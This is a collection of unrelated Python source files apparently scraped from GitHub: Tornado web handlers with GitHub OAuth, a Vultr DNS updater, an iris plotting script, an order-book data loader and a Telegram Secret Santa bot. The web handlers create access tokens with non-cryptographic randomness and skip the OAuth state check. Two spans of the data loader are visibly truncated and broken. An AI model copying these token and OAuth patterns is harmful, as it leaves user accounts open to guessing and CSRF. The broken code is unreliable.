repo=repo,\n samples=list(samples))\n except Repo.DoesNotExist:\n raise HTTPError(404)\n\nclass CreateRepoHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Create a new repository\"\n self.render(\"repo/new.html\", title=title, user=user)\n\n @authenticated\n def post(self):\n reponame = self.get_argument(\"reponame\", None)\n desc = self.get_argument(\"description\", None)\n user = self.current_user\n if not reponame:\n self.redirect(self.reverse_url(\"web:create-repo\"))\n return\n repo = Repo.create(user=user, name=reponame, desc=desc)\n self.redirect(self.reverse_url(\"web:repo\", user.name, repo.name))\n\nclass SettingsHandler(BaseHandler):\n @authenticated\n def get(self):\n user = self.current_user\n title = \"Account settings\"\n self.render(\"settings/index.html\", title=title, user=user,\n tokens=user.tokens)\n\n def on_finish(self):\n q = Token.update(seen=True).where(Token.user == self.current_user)\n q.execute()\n super(SettingsHandler, self).on_finish()\n\nclass NewTokenHandler(BaseHandler):\n @authenticated\n def get(self):\n self.render(\"tokens/new.html\")\n\n @authenticated\n def post(self):\n user = self.current_user\n desc = self.get_argument(\"description\")\n value = \"%040x\" % random.randrange(16**40)\n # TODO: Retry on duplicate token value (peewee.IntegrityError)?\n Token.create(user=user, value=value, desc=desc)\n self.redirect(self.reverse_url(\"web:settings\"))\n\nclass DelTokenHandler(BaseHandler):\n @authenticated\n def post(self, id):\n try:\n token = Token.get((Token.user == self.current_user) & (Token.id == id))\n token.delete_instance()\n self.redirect(self.reverse_url(\"web:settings\"))\n except:\n raise HTTPError(404)\n\nclass JoinHandler(BaseHandler):\n \"\"\"Allows users to join through email and password or GitHub OAuth.\"\"\"\n\n def get(self):\n if not self.current_user:\n self.render(\"join/new.html\")\n else:\n self.redirect(\"/\")\n\n # def post(self):\n # email = self.get_argument(\"email\")\n # name = self.get_argument(\"username\")\n # pass, salt = ...\n # try:\n # User.create(name=username, email=email, pass=pass, salt=salt)\n # except peewee.IntegrityError:\n # self.redirect(self.reverse_url(\"web:join\"))\n # self.redirect(\"/\")\n\nclass AuthHandler(BaseHandler):\n \"\"\"Authenticates users via username and password.\"\"\"\n\n def get(self):\n if not self.current_user:\n self.render(\"auth/new.html\", title=\"Sign in - tailr\")\n else:\n self.redirect(\"/\")\n\n # def post(self):\n # username = self.get_argument(\"username\")\n # user = User.get(User.name == username)\n # # confirm password, else deny access\n # if user... == ...:\n # self.set_current_user(user)\n # self.redirect(self.get_argument(\"next\", \"/\"))\n # else:\n # self.redirect(self.reverse_url(\"web:auth\"))\n\nclass GitHubOAuth2Mixin(tornado.auth.OAuth2Mixin):\n \"\"\"GitHub authentication using OAuth2.\"\"\"\n\n _OAUTH_ACCESS_TOKEN_URL = \"https://github.com/login/oauth/access_token\"\n _OAUTH_AUTHORIZE_URL = \"https://github.com/login/oauth/authorize\"\n _OAUTH_SETTINGS_KEY = \"github_oauth\"\n\n _GITHUB_API_BASE_URL = \"https://api.github.com\"\n\n @tornado.auth._auth_return_future\n def get_authenticated_user(self, redirect_uri, code, callback):\n http = self.get_auth_http_client()\n\n body = tornado.auth.urllib_parse.urlencode({\n \"redirect_uri\": redirect_uri,\n \"code\": code,\n \"client_id\": self.settings[self._OAUTH_SETTINGS_KEY][\"key\"],\n \"client_secret\": self.settings[self._OAUTH_SETTINGS_KEY][\"secret\"],\n })\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\",\n }\n\n http.fetch(self._OAUTH_ACCESS_TOKEN_URL,\n functools.partial(self._on_access_token, callback),\n method=\"POST\", headers=headers, body=body)\n\n def _on_access_token(self, future, response):\n if response.error:\n msg = \"GitHub auth error: %s: %s\" % (response.error, response.body)\n future.set_exception(tornado.auth.AuthError(msg))\n return\n\n args = tornado.escape.json_decode(response.body)\n\n self.github_request(\"/user\",\n functools.partial(self._on_user_info, future),\n access_token=args[\"access_token\"])\n\n @tornado.auth._auth_return_future\n def github_request(self, path, callback, access_token=None, **args):\n url = self._GITHUB_API_BASE_URL + path\n\n headers = {\n \"User-Agent\": \"tailr\",\n \"Accept\": \"application/json\",\n }\n\n if access_token is not None:\n headers[\"Authorization\"] = \"token %s\" % access_token\n\n callback = functools.partial(self._on_github_request, callback)\n\n http = self.get_auth_http_client()\n\n http.fetch(url, callback, headers=headers)\n\n def _on_github_request(self, future, response):\n if response.error:\n msg = \"GitHub API error: %s: %s\" % (response.error, response.body)\n future.set_exception(tornado.auth.AuthError(msg))\n return\n\n result = tornado.escape.json_decode(response.body)\n future.set_result(result)\n\n def _on_user_info(self, future, info):\n future.set_result(info)\n\n def get_auth_http_client(self):\n return tornado.httpclient.AsyncHTTPClient()\n\nclass GitHubAuthHandler(BaseHandler, GitHubOAuth2Mixin):\n \"\"\"Authenticates users via GitHub OAuth.\"\"\"\n\n @tornado.gen.coroutine\n def get(self):\n if self.get_argument(\"code\", False):\n info = yield self.get_authenticated_user(\n redirect_uri=self.redirect_uri,\n code=self.get_argument(\"code\"))\n\n github_id = info.get(\"id\", None)\n\n if github_id is None:\n self.redirect(self.reverse_url(\"web:auth\"))\n return\n\n try:\n user = User.get(User.github_id == github_id)\n except User.DoesNotExist:\n user = None\n\n if user is None:\n data = dict(\n name=info.get(\"login\"),\n github_id=github_id,\n homepage_url=info.get(\"html_url\", None),\n avatar_url=info.get(\"avatar_url\", None),\n email=info.get(\"email\", None),\n confirmed=True)\n\n try:\n # try to use the users GitHub login name\n user = User.create(**data)\n except peewee.IntegrityError:\n # assign a temporary, random name\n data[\"name\"] = \"%040x\" % random.randrange(16**40)\n user = User.create(**data)\n\n self.set_current_user(user)\n\n self.redirect(self.get_argument(\"next\", \"/\"))\n else:\n # TODO: pass additional random `state` parameter and\n # check the value in the conditional branch above\n yield self.authorize_redirect(\n redirect_uri=self.redirect_uri,\n client_id=self.settings[\"github_oauth\"][\"key\"],\n response_type=\"code\",\n scope=[\"user:email\"])\n\n @property\n def redirect_uri(self):\n return \"%s://%s%s\" % (self.request.protocol,\n self.request.host, \"/auth/github\")\n\nclass DeauthHandler(BaseHandler):\n @authenticated\n def post(self):\n self.clear_current_user()\n self.redirect(\"/\")\n\nclass ErrorHandler(BaseHandler):\n \"\"\"Generates an error response with ``status_code`` for all requests.\"\"\"\n\n def initialize(self, status_code):\n self.set_status(status_code)\n\n def prepare(self):\n super(ErrorHandler, self).prepare()\n raise tornado.web.HTTPError(self.get_status())\n\n def check_xsrf_cookie(self):\n pass\n","repo_name":"pmeinhardt/tlr","sub_path":"handlers/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":11724,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"70035382569","text":"#!/usr/bin/env python3\n'''\nDynamic DNS service for Vultr\nBy Andy Smith\nhttps://ajsmith.us/\nhttps://github.com/andyjsmith/Vultr-Dynamic-DNS\n'''\n\nimport json\nimport sys\nimport requests\n\n# Import the values from the configuration file\nwith open(\"config.json\") as config_file:\n\tconfig = json.load(config_file) # Convert JSON to Python\n\ndomain = config[\"domain\"]\napi_key = config[\"api_key\"]\ndynamic_records = config[\"dynamic_records\"]\n\n# Get the public IP of the server\nip = requests.get(\"https://ip4.seeip.org\").text\ntry:\n\tipv6 = requests.get(\"https://ip6.seeip.org\", timeout=10).text\nexcept (requests.ConnectionError, requests.exceptions.Timeout) as e:\n\tprint(f'Couldn\\'t get IPv6 address, using IPv4 only.')\n\tipv6 = None\n\nresponse = requests.get(\"https://api.vultr.com/v2/domains/{}/records?per_page=500\".format(domain), headers={\"Authorization\": \"Bearer \" + api_key})\n\n# Get the list of DNS records from Vultr to translate the record name to recordid\nraw_response = response.text\nif \"is not authorized\" in raw_response:\n\tprint(\"There was an error. You are not authorized to use the API. Details are below.\")\n\tprint(\"NOTE: If using IPv6, or an IPv6 address is displayed below, you need to go to your account API settings and click Allow all IPv6.\")\n\tprint(\"Error returned from Vultr API:\")\n\ntry:\n\tresponse.raise_for_status()\nexcept requests.HTTPError:\n\tprint(\"Error returned from Vultr API:\")\n\tprint(raw_response)\n\tsys.exit(1)\n\ntry:\n\traw_records = json.loads(raw_response)\nexcept json.decoder.JSONDecodeError:\n\tprint(\"Error returned from Vultr API:\")\n\tprint(raw_response)\n\tsys.exit(1)\n\ndef get_records_to_change(record_type, ip):\n\t# Filter out other records besides A/AAAA records\n\trecords_to_check = [\n\t\trecord\n\t\tfor record in raw_records[\"records\"]\n\t\tif record[\"type\"] == record_type and record[\"name\"] in dynamic_records\n\t]\n\n\trecords_to_change = [\n\t\trecord\n\t\tfor record in records_to_check\n\t\tif record[\"data\"] != ip\n\t]\n\n\tfor record in records_to_change:\n\t\trecord[\"new_ip\"] = ip\n\n\treturn records_to_check, records_to_change\n\ncheck_ipv4, change_ipv4 = get_records_to_change(\"A\", ip)\ncheck_ipv6, change_ipv6 = get_records_to_change(\"AAAA\", ipv6) if ipv6 is not None else ([], [])\n\n# Cancel if no records from Vultr match the config file\nif len(check_ipv4+check_ipv6) == 0:\n\tprint(\"Configuration error, no records to change.\")\n\tsys.exit(1)\n\nrecords_to_change = change_ipv4 + change_ipv6\nif len(records_to_change) == 0:\n\tprint(\"IP address has not changed. No records have been updated.\")\n\tsys.exit(0)\n\nchanges = sorted(set(\n\t(record[\"data\"], record[\"new_ip\"])\n\tfor record in records_to_change\n))\n\nprint(\"IP has changed since last checking.\")\nfor old_ip, new_ip in changes:\n\tprint(f\"Old IP on Vultr: {old_ip}, current server IP: {new_ip}\")\n\n# Update the records in Vultr with the new IP address\nfor record in records_to_change:\n\tpayload = {\"data\": record[\"new_ip\"]}\n\tresponse = requests.patch(\"https://api.vultr.com/v2/domains/{}/records/{}\".format(domain, record[\"id\"]), json=payload, headers={\"Authorization\": \"Bearer \" + api_key})\n\tname = record[\"name\"]\n\tif name == \"\":\n\t\tname = \"@\"\n\tif \"error\" in response.text:\n\t\tprint(\"Error returned from Vultr API:\")\n\t\tprint(response.text)\n\telse:\n\t\tprint(f\"Changed {name}/{record['type']} ({record['id']}) to {record['new_ip']} in {domain}\")\n","repo_name":"andyjsmith/Vultr-Dynamic-DNS","sub_path":"ddns.py","file_name":"ddns.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"}
+{"seq_id":"33998696076","text":"# Fiona O'Riordan 28 March 2019 \n# Project Iris Data Set\n# Create histograms for all 4 variables in the data set distinctly showing an approximate frequency distribution of each of the quantitative variables in the set.\n# Adapted from:\n# https://machinelearningmastery.com/machine-learning-in-python-step-by-step/ [18]\n# https://www.youtube.com/watch?v=r75BPh1uk38 [19]\n# https://stackoverflow.com/a/19603918/11250489 [20]\n# https://stackoverflow.com/questions/37970424/what-is-the-difference-between-drawing-plots-using-plot-axes-or-figure-in-matpl/37970713 [21]\n# import the pandas libary in order to use the read_csv function below and rename as pd \nimport pandas as pd\n# import the matplotlib library class pyplot in order to use the show function below and rename as plt\nimport matplotlib.pyplot as plt\n\n\n# url = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\" \nnames = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class'] \n# load the data by reading in the iris csv\niris = pd.read_csv(\"iris.csv\", names=names)\n\n# create a histogram for all the 4 variables \n# the default number of bins =10 but set the number of bins = 20 so that we can see the data grouped into smaller ranges.\n# plt.hist(bins=20)\n\n# creating the histograms for all 4 variables distinctly so that I can label \n# and color each chart distinctly\n\n# name the output file \nplt.figure('Histogram1')\nplt.subplot(2,2,1)\niris['petal-width'].hist(bins=20)\n# x axis is from 0 to 5, y axis is from 0 to 18 with intervals of 1\n# create an x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.ylabel('frequency')\nplt.title('petal-width')\n\n\nplt.subplot(2,2,2)\niris['petal-width'].hist(bins=20)\n# x axis is from 0 to 5, y axis is from 0 to 18 with intervals of 1\n# create an x axis label\nplt.xlabel('range')\n# create a y axis label\nplt.title('petal-length')\n\nplt.subplot(2,2,3)\niris['sepal-length'].hist(bins=20)\n# create x axis label\nplt.xlabel('range')\n# create an y axis label\nplt.ylabel('frequency')\nplt.title('sepal-length')\n\nplt.subplot(2,2,4)\niris['sepal-width'].hist(bins=20)\n# create an x axis label\nplt.xlabel('range')\n# create an y axis label\nplt.ylabel('frequency')\nplt.title('sepal-width')\n\n\n# generate a file to output the graph\nplt.show()\n\n","repo_name":"fionaoriordan/52445_19_iris","sub_path":"histiris.py","file_name":"histiris.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4869649203","text":"# encoding: utf-8\n# file: data_util.py\n# author: shawn233\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport time\nimport numpy as np\n\n'''\nFunctions:\n1. divide data into training set, dev set and test set (7:1:2)\n2. provide function `next_batch()`, returns the next batch in one epoch;\n provide function `reset_batch()`, to reset the batch for a new epoch.\n\nUsage tips:\n1. Assume memory is large enough to store all data, will use `readlines()` to read data;\n'''\n\n'''\nTODO:\n1. divide data based on date; (done)\n2. add time stamp to feature; (done)\n3. delete midprice for feature; (done)\n4. clean data to include only 3-sec intervals; (done)\n5. remove time stamp intervals from features; (done)\n6. attemp: remove volume from features; success? (seens not)\n7. fine processing of data_matrix to get more train data: \n eliminate intervals less than 3 secs; (done) (may need to discard)\n8. correct the mistake of crossing a day when calculating mean mid price;\n9. correct the mistake of deleting time stamps for calculating mean mid price;\n\n'''\n\nTRAIN_INPUTS_FILENAME = 'train_inputs.npy'\nTRAIN_LABELS_FILENAME = 'train_labels.npy'\nDEV_INPUTS_FILENAME = 'dev_inputs.npy'\nDEV_LABELS_FILENAME = 'dev_labels.npy'\nTEST_INPUTS_FILENAME = 'test_inputs.npy'\nTEST_LABELS_FILENAME = 'test_labels.npy'\n\nTRAIN_MEANS_FILENAME = 'train_means.npy'\nTRAIN_STDDEVS_FILENAME = 'train_stddevs.npy'\nDEV_MEANS_FILENAME = 'dev_means.npy'\nDEV_STDDEVS_FILENAME = 'dev_stddevs.npy'\nTEST_MEANS_FILENAME = 'test_means.npy'\nTEST_STDDEVS_FILENAME = 'test_stddevs.npy'\n\nTRAIN_DATA_FILENAME = 'train_data.csv'\nTEST_DATA_FILENAME = 'test_data.csv'\n\nTRAIN_DATA_PRE_PROCESSED_FILENAME = 'train_preprocessed.npy'\nTEST_DATA_PRE_PROCESSED_FILENAME = 'test_preprocessed.npy'\nPRE_PROCESS_RECORD_FILENAME = 'preprocess.txt'\n\n\ndef _save_data (inputs, labels, full_path_dir, inputs_name, label_name):\n '''\n Save data into full_path_dir\n \n used in function `divide_data()`\n '''\n\n #arr_inputs = np.array(inputs, dtype=np.float32)\n #arr_labels = np.array(labels, dtype=np.float32)\n\n np.save(os.path.join (full_path_dir, inputs_name), inputs)\n np.save(os.path.join (full_path_dir, label_name), labels)\n\n\ndef _read_data (full_path_dir, inputs_name, labels_name):\n '''\n Read data from full_path_dir\n \n Returns:\n inputs, labels\n '''\n\n return np.load (os.path.join (full_path_dir, inputs_name)),\\\n np.load (os.path.join (full_path_dir, labels_name))\n\n\nclass OrderBook:\n\n '''\n Order book class, designed mainly for data input\n '''\n\n def __init__ (self, batch_size, data_dir, \n num_inputs=10,\\\n num_labels=20,\\\n data_regenerate_flag=False):\n '''\n Initialization, open the files and set the arguments\n\n Args:\n - batch_size: int;\n - data_dir: string, directory of the data\n - data_regenerate_flag: bool, True if re-process data, False if use stored data\n '''\n\n self._batch_size = batch_size\n self.batch_ind = 0\n self._data_dir = data_dir\n self._num_inputs = num_inputs\n self._num_labels = num_labels\n self.num_features = None # will be later set after processing data\n\n # vars for training set\n self.train_inputs = None\n self.train_labels = None\n self.train_means = None\n self.train_stddevs = None\n\n # vars for dev set\n self.dev_inputs = None\n self.dev_labels = None\n self.dev_means = None\n self.dev_stddevs = None\n\n # vars for test set\n self.test_inputs = None\n self.test_labels = None\n self.test_means = None\n self.test_stddevs = None\n\n # var for recording index in data matrix\n self.index = {\n 'Date':1,\n 'Time':2,\n 'MidPrice':3,\n 'LastPrice':4,\n 'Volume':5,\n 'BidPrice1':6,\n 'BidVolume1':7,\n 'AskPrice1':8,\n 'AskVolume1':9,\n 'TimeStamp':10\n }\n \n if data_regenerate_flag or not os.path.exists (os.path.join (self._data_dir, TRAIN_INPUTS_FILENAME)):\n self.__data_process_procedure()\n\n self.train_inputs, self.train_labels, self.train_means, self.train_stddevs = \\\n self.__load_inputs_and_labels(os.path.join (self._data_dir, TRAIN_INPUTS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_LABELS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_MEANS_FILENAME),\\\n os.path.join (self._data_dir, TRAIN_STDDEVS_FILENAME))\n\n self.num_features = self.train_inputs.shape[2]\n\n\n\n\n @property\n def batch_size (self):\n return self._batch_size\n\n \n @batch_size.setter\n def batch_size (self, value):\n self._batch_size = value\n\n \n @property\n def data_dir (self):\n return self._data_dir\n\n\n @data_dir.setter\n def data_dir (self, value):\n self._data_dir = value\n\n\n @property\n def num_samples (self):\n '''\n Number of training samples\n '''\n\n return self.train_inputs.shape[0]\n\n \n @property\n def num_batches (self):\n '''\n Maximum number of batches that can be provided in one epoch\n '''\n return int (self.num_samples / self.batch_size)\n\n\n\n def __data_process_procedure (self):\n '''\n Define the procedure of data processing\n\n Args:\n None\n\n Returns:\n None\n '''\n\n # train data\n print (\"Start processing training data\")\n print (\"Reading data matrix...\")\n data_matrix = \\\n self.__read_data_matrix (os.path.join (self._data_dir, TRAIN_DATA_FILENAME))\n print (\"Done\")\n print (\"Dividing data matrix into days...\")\n day_matrix_list = \\\n self.__divide_by_day (data_matrix)\n print (\"Done\")\n print (\"Generating samples...\")\n sample_inputs_list, sample_labels_list, base_index = \\\n self.__generate_samples (day_matrix_list)\n print (\"Done\")\n print (\"Normalizing samples...\")\n sample_inputs_list, sample_labels_list, mean_list, stddev_list = \\\n self.__sample_normalization (sample_inputs_list, sample_labels_list, base_index)\n print(\"Done\")\n print(\"Remove lastPrice feature...\")\n sample_inputs_list, sample_labels_list, mean_list, stddev_list = \\\n self.__remove_lastPrice(sample_inputs_list, sample_labels_list, base_index)\n print (\"Done\")\n print (\"Saving samples...\")\n train_inputs_path, train_labels_path, train_means_path, train_stddevs_path = \\\n self.__store_inputs_and_labels (sample_inputs_list, sample_labels_list, mean_list, stddev_list)\n print (\"Done\")\n print (\"Processing training data completed\")\n\n # test data\n print (\"Start procssing test data\")\n print (\"Reading data matrix...\")\n data_matrix = \\\n self.__read_data_matrix (os.path.join (self._data_dir, TEST_DATA_FILENAME))\n print (\"Done\")\n print (\"Parsing test data...\")\n test_inputs_list, base_index = \\\n self.__parse_test_data (data_matrix)\n print (\"Done\")\n print (\"Normalizing test inputs...\")\n meaningless_test_labels_list = np.zeros (shape=[len(test_inputs_list)]) # just fit the arguments of __sample_normalization\n test_inputs_list, meaningless_test_labels_list, mean_list, stddev_list = \\\n self.__sample_normalization (test_inputs_list, meaningless_test_labels_list, base_index)\n print (\"Done\")\n print (\"Saving test inputs...\")\n self.__store_test_inputs (test_inputs_list, mean_list, stddev_list)\n print (\"Done\")\n print (\"Procssing test data completed\")\n\n\n\n def __read_data_matrix(self, in_filename):\n '''\n Read the train data matrix\n\n Args:\n - in_filename: string, input file name;\n\n Returns:\n - data_matrix: 2-d np matrix, dtype= refer4:\n continue # remove the data not in transaction time\n line.append (timeStamp)\n data_matrix.append (line)\n \n in_f.close()\n\n data_matrix = np.asarray (data_matrix)\n print ('data matrix shape:', data_matrix.shape)\n \n return data_matrix\n\n\n\n def __divide_by_day (self, input_matrix):\n '''\n Divide train data by day and morning/afternoon\n\n Args:\n - input_matrix: 2-d np matrix, dtype= 1e-4:\n if show_error:\n print ('[validate error] input matrix timestamp error:')\n print (input_matrix)\n return False\n\n for i in range (self._num_labels):\n if np.abs (midprice_matrix[i, 0]) > 3.1:\n if show_error:\n print ('[validate error] mid price matrix crosses a day')\n print (midprice_matrix)\n return False\n\n return True\n\n\n\n def __divide_data (self, in_filename):\n '''\n [Discard]\n Divide data into training set, and dev set (9:1), **after pre-processing**\n \n Args:\n - in_filename: string, full path of pre-processed data file\n \n Returns:\n - None\n\n (Implementation specified for projects, can not be reused)\n '''\n \n input_size = 10\n output_avg_len = 20\n\n data_matrix = np.load (in_filename)\n \n # 1. generate inputs and lables from data_matrix\n inputs = []\n labels = []\n\n total_cnt = 0\n accepted_cnt = 0\n\n num_inputs = data_matrix.shape[0] - (input_size + output_avg_len) + 1\n\n # mean and stddev prepared for later calculation\n pre_mean_labels = self.pre_mean[1]\n pre_stddev_labels = self.pre_stddev[1]\n \n for i in range (num_inputs):\n # delete midprice from input features \n input_matrix = np.hstack ((data_matrix[i:(i+input_size), :1], \n data_matrix[i:(i+input_size), 2:]))\n total_cnt += 1\n \n input_matrix[0, 0] = 3.0\n midprice_matrix = data_matrix[i+input_size:i+input_size+output_avg_len, 1:2]\n midprice_timestamp_matrix = data_matrix[i+input_size:i+input_size+output_avg_len, :1]\n if (self.__validate_input (input_matrix, midprice_timestamp_matrix)):\n accepted_cnt += 1\n inputs.append (input_matrix[:, 1:])\n label_val = np.mean (midprice_matrix)\n labels.append ((label_val-pre_mean_labels)/pre_stddev_labels)\n\n assert len(inputs) == len(labels)\n print ('accepted train samples:', accepted_cnt, '/', total_cnt)\n\n # 2. divide train data and dev data\n indices = np.asarray(list (range(len(inputs))))\n np.random.shuffle (indices)\n\n train_data_bound = int (np.ceil(len(inputs) * 0.9))\n dev_data_bound = len (inputs)\n\n train_inputs = []\n train_labels = []\n dev_inputs = []\n dev_labels = []\n\n for i in indices[:train_data_bound]:\n train_inputs.append (inputs[i])\n train_labels.append (labels[i])\n\n for i in indices[train_data_bound:]:\n dev_inputs.append (inputs[i])\n dev_labels.append (labels[i])\n\n train_inputs = np.asarray (train_inputs)\n train_labels = np.asarray (train_labels)\n dev_inputs = np.asarray (dev_inputs)\n dev_labels = np.asarray (dev_labels)\n\n # 3. save train and dev data\n full_path_dir = os.path.dirname (in_filename)\n _save_data (train_inputs, train_labels, full_path_dir, TRAIN_INPUTS_FILENAME, TRAIN_LABELS_FILENAME)\n _save_data (dev_inputs, dev_labels, full_path_dir, DEV_INPUTS_FILENAME, DEV_LABELS_FILENAME)\n #_save_data (test_inputs, test_labels, full_path_dir, TEST_INPUTS_FILENAME, TEST_LABELS_FILENAME)\n\n\n\n \n def __read_test_data (self, in_filename):\n '''\n [Discard]\n Read and save test data set after pre-process test data\n\n Args:\n - in_filename: string, path of pre-processed test data.\n\n Returns:\n - None\n '''\n \n input_size = 10\n data_matrix = np.load (in_filename)\n\n num_inputs = data_matrix.shape[0] // input_size\n assert num_inputs * input_size == data_matrix.shape[0]\n\n inputs = []\n for i in range (num_inputs):\n input_matrix = np.hstack ((data_matrix[i*input_size:(i+1)*input_size, :1],\n data_matrix[i*input_size:(i+1)*input_size, 2:]))\n input_matrix[0, 0] = 3.0\n #assert self.__validate_input (input_matrix, show_error=True)\n inputs.append (input_matrix[:, 1:])\n\n full_path_dir = os.path.dirname (in_filename)\n _save_data (inputs, [], full_path_dir, TEST_INPUTS_FILENAME, TEST_LABELS_FILENAME)\n\n\n\n\n def next_batch (self):\n '''\n Get the next batch of the training set\n\n Returns:\n train_inputs_batch: a padded input batch, batch_size x max_len x n_input\n train_labels_batch: a padded label batch, batch_size x 1\n '''\n\n if self.train_inputs is None:\n self.train_inputs, self.train_labels = _read_data (self.data_dir, TRAIN_INPUTS_FILENAME, TRAIN_LABELS_FILENAME)\n\n assert self.batch_ind + self.batch_size <= len (self.train_inputs)\n\n train_batch_inputs = self.train_inputs[self.batch_ind: self.batch_ind + self.batch_size]\n train_batch_labels = self.train_labels[self.batch_ind: self.batch_ind + self.batch_size]\n\n self.batch_ind += self.batch_size\n\n return train_batch_inputs, train_batch_labels\n\n\n def reset_batch (self):\n '''\n Reset self.batch_ind for a new epoch\n '''\n\n self.batch_ind = 0\n\n\n def dev_set (self): \n '''\n Get the padded dev inputs and labels\n\n Returns:\n dev_inputs: a list of inputs (lists);\n dev_lables: a list of labels\n '''\n\n if self.dev_inputs is None:\n self.dev_inputs, self.dev_labels = _read_data (self.data_dir, DEV_INPUTS_FILENAME, DEV_LABELS_FILENAME)\n\n return self.dev_inputs, self.dev_labels\n\n\n def test_set (self):\n '''\n Get the test inputs, means and stddevs\n\n Returns:\n test_inputs: 3-d np array;\n test_means: 1-d np array;\n test_stddevs: 1-d np array;\n '''\n\n if self.test_inputs is None:\n self.test_inputs, self.test_means, self.test_stddevs = \\\n self.__load_test_inputs (os.path.join (self._data_dir, TEST_INPUTS_FILENAME),\\\n os.path.join (self._data_dir, TEST_MEANS_FILENAME),\\\n os.path.join (self._data_dir, TEST_STDDEVS_FILENAME))\n\n return self.test_inputs, self.test_means, self.test_stddevs\n\n\n\n\n\nif __name__ == \"__main__\":\n BASE_DIR = os.path.dirname (os.path.abspath(sys.argv[0]))\n #INPUT_FILENAME = 'train1.csv'\n PROJECT_DIR = os.path.dirname (BASE_DIR)\n DATA_DIR = os.path.join (PROJECT_DIR, 'data')\n\n order_book = OrderBook (2, DATA_DIR, data_regenerate_flag=True)\n \n print (order_book.num_batches)\n for i in range (10):\n inputs, labels, mean, stddev = order_book.next_batch_with_mean_and_stddev ()\n print (inputs)\n print (labels)\n print (mean)\n print (stddev)\n input ()\n\n #test_inputs, _ = order_book.test_set()\n #print (test_inputs.shape)\n\n","repo_name":"lunaryan/my_AI","sub_path":"data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":29585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17396274358","text":"# - *- coding: utf- 8 - *-\nimport copy\nimport logging\nimport random\nfrom functools import wraps\n\nimport telegram\nfrom telegram.ext import Updater, CommandHandler\nfrom telegram.error import (\n TelegramError,\n Unauthorized,\n BadRequest,\n TimedOut,\n ChatMigrated,\n NetworkError,\n)\n\n\nrules_text = (\n \"Правила Секретного Санты: \\n\"\n + \"1. Санта Секретный - никому не говори, кто тебе выпал!\\n\"\n + \"2. Подарок должен быть не дороже 200 грн.\\n\"\n + \"3. Спрячь свой подарок в красный мешок (найдешь его под елкой).\\n\"\n + \"4. Санта придет к тебе только после боя курантов.\\n\"\n)\n\n\ndef send_typing_action(func):\n \"\"\"Sends typing action while processing func command.\"\"\"\n\n @wraps(func)\n def command_func(*args, **kwargs):\n bot, update = args\n bot.send_chat_action(\n chat_id=update.effective_message.chat_id, action=telegram.ChatAction.TYPING\n )\n return func(bot, update, **kwargs)\n\n return command_func\n\n\n@send_typing_action\ndef start(bot, update):\n if update.message.chat.type == \"group\":\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Я тайный помощник Санты. Для того , чтобы магия произошла, \"\n \"кликни сюда -> @\" + str(bot.get_me()[\"username\"]) + \" и нажми старт!\",\n )\n bot.send_message(\n chat_id=update.message.chat_id,\n text=rules_text,\n parse_mode=telegram.ParseMode.HTML,\n )\n\n else:\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Круто, мы не забудем о тебе. Переходи в общий чат и регистрируйся.\",\n )\n\n\n@send_typing_action\ndef rules(bot, update):\n bot.send_message(\n chat_id=update.message.chat_id,\n text=rules_text,\n parse_mode=telegram.ParseMode.HTML,\n )\n\n\npeople = []\npairs = dict()\n\n\n@send_typing_action\ndef register(bot, update):\n u = User(\n update.effective_user.id,\n update.effective_user.username,\n update.effective_user.first_name,\n update.effective_user.last_name,\n )\n if u not in people:\n # print(update.effective_user.id)\n print(update.effective_user.username)\n # print(update.effective_user.first_name)\n # print(update.effective_user.last_name)\n people.append(u)\n bot.send_message(\n update.effective_user.id, \"Ты добавлен в список Секретного Санты!\"\n )\n else:\n bot.send_message(\n update.effective_user.id,\n \"Ты уже добавлен в мой список. Жди когда волшебство произойдет\",\n )\n\n\ndef info(bot, update):\n for p in people:\n print(p.username)\n print(p.last_name)\n\n\nclass User:\n def __init__(self, user_id, username, first_name, last_name):\n self.user_id = user_id\n self.username = username\n self.first_name = first_name\n self.last_name = last_name\n\n def __hash__(self):\n return hash(self.user_id)\n\n def __eq__(self, other):\n return self.user_id == other.user_id\n\n\ndef secret_santa(names):\n my_list = names\n choose = copy.copy(my_list)\n result = []\n for i in my_list:\n names = copy.copy(my_list)\n names.pop(names.index(i))\n chosen = random.choice(list(set(choose) & (set(names))))\n result.append((i, chosen))\n choose.pop(choose.index(chosen))\n return result\n\n\ndef magic(bot, update):\n # try:\n if update.effective_user.username == \"yarikpavlin\":\n print(\"Length \" + str(len(people)))\n if len(people) == bot.get_chat_members_count(update.message.chat.id) - 1:\n for i in secret_santa(people):\n # i - array with pari of receiver and provider\n # i[0] - user which is going to make a present\n # i[1] - user which is going to take a present\n # If receiver has username, show his username\n if i[1].username is not None:\n print(i[1])\n bot.send_message(\n i[0].user_id,\n \"Ты должен подготовить подарок для @\" + str(i[1].username),\n )\n # Else, show just first name\n else:\n bot.send_message(\n i[0].user_id,\n \"Ты должен подготовить подарок для \" + str(i[1].first_name),\n )\n\n print(\"Gifts almost here\")\n bot.send_message(\n chat_id=update.message.chat_id,\n text=\"Супер! Каждый получил своего тайного санту! Остаеться ждать Нового Года!\",\n )\n else:\n print(\"Some later, now it's \")\n bot.send_message(\n update.effective_user.id, \"Some later, now it's \" + str(len(people))\n )\n else:\n print(\"You are not Santa's helper, I'm sorry \")\n bot.send_message(\n update.effective_user.id, \"You are not Santa's helper, I'm sorry \"\n )\n\n\n# except Exception as inst:\n# print(inst)\n# print(people)\n# print(secret_santa(people))\n\n\ndef error_callback(bot, update, error):\n try:\n raise error\n except 